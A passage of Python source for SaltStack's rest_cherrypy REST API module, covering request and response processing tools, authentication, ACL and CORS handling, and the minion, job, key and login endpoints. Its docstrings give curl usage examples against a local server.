being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
"""
import functools
import io
import itertools
import logging
import os
import signal
import tarfile
import time
from collections.abc import Iterator, Mapping
from multiprocessing import Pipe, Process
from urllib.parse import parse_qsl
import cherrypy # pylint: disable=import-error,3rd-party-module-not-gated
import salt
import salt.auth
import salt.exceptions
import salt.netapi
import salt.utils.args
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
logger = logging.getLogger(__name__)
try:
from cherrypy.lib import ( # pylint: disable=import-error,3rd-party-module-not-gated
cpstats,
)
except AttributeError:
cpstats = None
logger.warning(
"Import of cherrypy.cpstats failed. Possible upstream bug: "
"https://github.com/cherrypy/cherrypy/issues/1444"
)
except ImportError:
cpstats = None
logger.warning("Import of cherrypy.cpstats failed.")
try:
# Imports related to websocket
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type("websockets", (object,), {"SynchronizingWebsocket": None})
HAS_WEBSOCKETS = False
def html_override_tool():
"""
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
"""
apiopts = cherrypy.config["apiopts"]
request = cherrypy.request
url_blacklist = (
apiopts.get("app_path", "/app"),
apiopts.get("static_path", "/static"),
)
if "app" not in cherrypy.config["apiopts"]:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get("Accept") == "*/*":
return
try:
wants_html = cherrypy.lib.cptools.accept("text/html")
except cherrypy.HTTPError:
return
else:
if wants_html != "text/html":
return
raise cherrypy.InternalRedirect(apiopts.get("app_path", "/app"))
def salt_token_tool():
"""
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
"""
x_auth = cherrypy.request.headers.get("X-Auth-Token", None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie["session_id"] = x_auth
def salt_api_acl_tool(username, request):
"""
.. versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
.. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
"""
failure_str = "[api_acl] Authentication failed for " "user %s from IP %s"
success_str = "[api_acl] Authentication successful for user %s from IP %s"
pass_str = "[api_acl] Authentication not checked for " "user %s from IP %s"
acl = None
# Salt Configuration
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get("api_acl", None)
ip = request.remote.ip
if acl:
users = acl.get("users", {})
if users:
if username in users:
if ip in users[username] or "*" in users[username]:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
elif username not in users and "*" in users:
if ip in users["*"] or "*" in users["*"]:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(pass_str, username, ip)
return True
def salt_ip_verify_tool():
"""
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
"""
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get("authorized_ips", None)
if auth_ip_list:
logger.debug("Found IP list: %s", auth_ip_list)
rem_ip = cherrypy.request.headers.get("Remote-Addr", None)
logger.debug("Request from IP: %s", rem_ip)
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: %s", rem_ip)
raise cherrypy.HTTPError(403, "Bad IP")
def salt_auth_tool():
"""
Redirect all unauthenticated requests to the login page
"""
# Redirect to the login page if the session hasn't been authed
if "token" not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers["Cache-Control"] = "private"
def cors_tool():
"""
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
"""
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head["Access-Control-Allow-Origin"] = req_head.get("Origin", "*")
resp_head["Access-Control-Expose-Headers"] = "GET, POST"
resp_head["Access-Control-Allow-Credentials"] = "true"
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == "OPTIONS":
ac_method = req_head.get("Access-Control-Request-Method", None)
allowed_methods = ["GET", "POST"]
allowed_headers = [
"Content-Type",
"X-Auth-Token",
"X-Requested-With",
]
if ac_method and ac_method in allowed_methods:
resp_head["Access-Control-Allow-Methods"] = ", ".join(allowed_methods)
resp_head["Access-Control-Allow-Headers"] = ", ".join(allowed_headers)
resp_head["Connection"] = "keep-alive"
resp_head["Access-Control-Max-Age"] = "1400"
# Note: CherryPy on Py3 uses binary objects for the response
# Python 2.6 also supports the byte prefix, so no need for conditionals
cherrypy.response.body = b""
cherrypy.response.status = 200
# CORS requests should short-circuit the other tools.
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session["token"] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
("application/json", salt.utils.json.dumps),
(
"application/x-yaml",
functools.partial(salt.utils.yaml.safe_dump, default_flow_style=False),
),
)
def hypermedia_handler(*args, **kwargs):
"""
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
"""
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (
salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError,
):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (
salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError,
) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc: # pylint: disable=broad-except
# The TimeoutError exception class was removed in CherryPy in 12.0.0, but
# Still check existence of TimeoutError and handle in CherryPy < 12.
# The check was moved down from the SaltClientTimeout error line because
# A one-line if statement throws a BaseException inheritance TypeError.
if hasattr(cherrypy, "TimeoutError") and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug(
"Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True,
)
cherrypy.response.status = 500
ret = {
"status": cherrypy.response.status,
"return": "{}".format(traceback.format_exc())
if cherrypy.config["debug"]
else "An unexpected error occurred",
}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers["Content-Type"] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
return salt.utils.stringutils.to_bytes(response)
except Exception: # pylint: disable=broad-except
msg = "Could not serialize the return data from Salt."
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
"""
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
"""
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
"""
A decorator to skip a processor function if process_request_body is False
"""
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
"""
Accept x-www-form-urlencoded data and reformat it into a Low State
data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
"""
# cherrypy._cpreqbody.process_urlencoded doesn't preserve the raw
# "body", so we have to handle parsing the tokens using parse_qsl
urlencoded = entity.read()
try:
urlencoded = urlencoded.decode("utf-8")
except (UnicodeDecodeError, AttributeError):
pass
cherrypy.serving.request.raw_body = urlencoded
unserialized_data = {}
for key, val in parse_qsl(urlencoded):
unserialized_data.setdefault(key, []).append(val)
for key, val in unserialized_data.items():
if len(val) == 1:
unserialized_data[key] = val[0]
if len(val) == 0:
unserialized_data[key] = ""
# Parse `arg` and `kwarg` just like we do it on the CLI
if "kwarg" in unserialized_data:
unserialized_data["kwarg"] = salt.utils.args.yamlify_arg(
unserialized_data["kwarg"]
)
if "arg" in unserialized_data:
for idx, value in enumerate(unserialized_data["arg"]):
unserialized_data["arg"][idx] = salt.utils.args.yamlify_arg(value)
cherrypy.serving.request.unserialized_data = unserialized_data
@process_request_body
def json_processor(entity):
"""
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid JSON document")
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
"""
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid YAML document")
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
"""
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
"""
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
"""
# Be liberal in what you accept
ct_in_map = {
"application/x-www-form-urlencoded": urlencoded_processor,
"application/json": json_processor,
"application/x-yaml": yaml_processor,
"text/yaml": yaml_processor,
"text/plain": text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (
cherrypy.request.method.upper() == "POST"
and cherrypy.request.headers.get("Content-Length", "0") == "0"
):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, "Content type not supported"
)
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
"""
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
"""
if cherrypy.request.method.upper() != "POST":
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, Mapping):
# Make the 'arg' param a list if not already
if "arg" in data and not isinstance(
data["arg"], list
): # pylint: disable=unsupported-membership-test
data["arg"] = [data["arg"]]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
"on_start_resource": [
("html_override", html_override_tool),
("salt_token", salt_token_tool),
],
"before_request_body": [
("cors_tool", cors_tool),
("salt_auth", salt_auth_tool),
("hypermedia_in", hypermedia_in),
],
"before_handler": [
("lowdata_fmt", lowdata_fmt),
("hypermedia_out", hypermedia_out),
("salt_ip_verify", salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(
cherrypy.tools, tool_name, cherrypy.Tool(hook, tool_fn, priority=(50 + idx))
)
###############################################################################
class LowDataAdapter:
"""
The primary entry point to Salt's REST API
"""
exposed = True
_cp_config = {
"tools.salt_token.on": True,
"tools.sessions.on": True,
"tools.sessions.timeout": 60 * 10, # 10 hours
# 'tools.autovary.on': True,
"tools.hypermedia_out.on": True,
"tools.hypermedia_in.on": True,
"tools.lowdata_fmt.on": True,
"tools.salt_ip_verify.on": True,
}
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
"""
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
"""
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, "Lowstates must be a list")
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk["token"] = token
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if client:
chunk["client"] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if "arg" in chunk and not isinstance(chunk["arg"], list):
chunk["arg"] = [chunk["arg"]]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, Iterator):
yield from ret
else:
yield ret
@cherrypy.config(**{"tools.sessions.on": False})
def GET(self):
"""
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
"""
return {
"return": "Welcome",
"clients": salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
"""
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
"""
return {"return": list(self.exec_lowstate(token=cherrypy.session.get("token")))}
class Minions(LowDataAdapter):
"""
Convenience URLs for working with minions
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
"""
cherrypy.request.lowstate = [
{"client": "local", "tgt": mid or "*", "fun": "grains.items"}
]
return {
"return": list(self.exec_lowstate(token=cherrypy.session.get("token"))),
}
def POST(self, **kwargs):
"""
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
"""
job_data = list(
self.exec_lowstate(
client="local_async", token=cherrypy.session.get("token")
)
)
cherrypy.response.status = 202
return {
"return": job_data,
"_links": {
"jobs": [{"href": "/jobs/{}".format(i["jid"])} for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, jid=None, timeout=""): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
"""
lowstate = {"client": "runner"}
if jid:
lowstate.update({"fun": "jobs.list_job", "jid": jid})
else:
lowstate.update({"fun": "jobs.list_jobs"})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(token=cherrypy.session.get("token")))
ret = {}
if jid:
ret["info"] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get("Result")
for minion in returns:
if "return" in returns[minion]:
minion_ret[minion] = returns[minion].get("return")
else:
minion_ret[minion] = returns[minion].get("return")
ret["return"] = [minion_ret]
else:
ret["return"] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
"""
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
"""
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
"""
if mid:
lowstate = [{"client": "wheel", "fun": "key.finger", "match": mid}]
else:
lowstate = [{"client": "wheel", "fun": "key.list_all"}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get("token"))
return {"return": next(result, {}).get("data", {}).get("return", {})}
@cherrypy.config(**{"tools.hypermedia_out.on": False, "tools.sessions.on": False})
def POST(self, **kwargs):
r"""
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
"""
lowstate = cherrypy.request.lowstate
lowstate[0].update({"client": "wheel", "fun": "key.gen_accept"})
if "mid" in lowstate[0]:
lowstate[0]["id_"] = lowstate[0].pop("mid")
result = self.exec_lowstate()
ret = next(result, {}).get("data", {}).get("return", {})
pub_key = ret.get("pub", "")
pub_key_file = tarfile.TarInfo("minion.pub")
pub_key_file.size = len(pub_key)
priv_key = ret.get("priv", "")
priv_key_file = tarfile.TarInfo("minion.pem")
priv_key_file.size = len(priv_key)
fileobj = io.BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode="w")
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, io.BytesIO(pub_key))
tarball.addfile(priv_key_file, io.BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers[
"Content-Disposition"
] = 'attachment; filename="saltkeys-{}.tar"'.format(lowstate[0]["id_"])
headers["Content-Type"] = "application/x-tar"
headers["Content-Length"] = len(fileobj.getvalue())
headers["Cache-Control"] = "no-cache"
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
"""
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
"""
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
"""
cherrypy.response.headers["WWW-Authenticate"] = "Session"
return {
"status": cherrypy.response.status,
"return": "Please log in",
}
def POST(self, **kwargs):
"""
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
"""
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning("Salt Master is not available.")
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get("username", None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if "token" not in token:
raise cherrypy.HTTPError(
401, "Could not authenticate using provided credentials"
)
cherrypy.response.headers["X-Auth-Token"] = cherrypy.session.id
cherrypy.session["token"] = token["token"]
cherrypy.session["timeout"] = (token["expire"] - token["start"]) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get("external_auth", {}).get(token["eauth"], {})
if token["eauth"] == "django" and "^model" in eauth:
perms = token["auth_list"]
else:
perms = salt.netapi.sum_permissions(token, eauth)
perms = salt.netapi.sorted_permissions(perms)
if not perms:
logger.debug("Eauth permission list not found.")
except Exception: # pylint: disable=broad-except
logger.debug(
"Configuration for external_auth malformed for eauth %r, and user %r.",
token.get("eauth"),
token.get("name"),
exc_info=True,
)
perms = None
return {
"return": [
{
"token": cherrypy.session.id,
"expire": token["expire"],
"start": token["start"],
"user": token["name"],
"eauth": token["eauth"],
"perms": perms or {},
}
]
}
